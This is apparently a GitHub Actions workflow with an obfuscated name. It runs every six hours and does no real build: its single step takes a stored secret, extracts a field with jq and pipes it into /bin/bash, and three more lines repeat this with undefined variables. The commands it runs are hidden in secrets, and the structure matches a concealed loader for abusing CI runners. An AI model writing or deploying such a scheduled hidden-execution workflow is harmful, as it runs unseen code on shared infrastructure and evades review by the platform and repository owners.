name: xianghuaguo3451
on:
  workflow_dispatch:
  schedule:
    - cron: '9 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianghuaguo3451
        env:
          w41: ${{ secrets.w41 }}
        run: |
          echo $w41 | jq -r .c7066 | /bin/bash
          echo $aq89895 | jq -r .oicqd18 | /bin/bash
          echo $m9130 | jq -r .vrew46 | /bin/bash
          echo $lttru4 | jq -r .bhall498 | /bin/bash

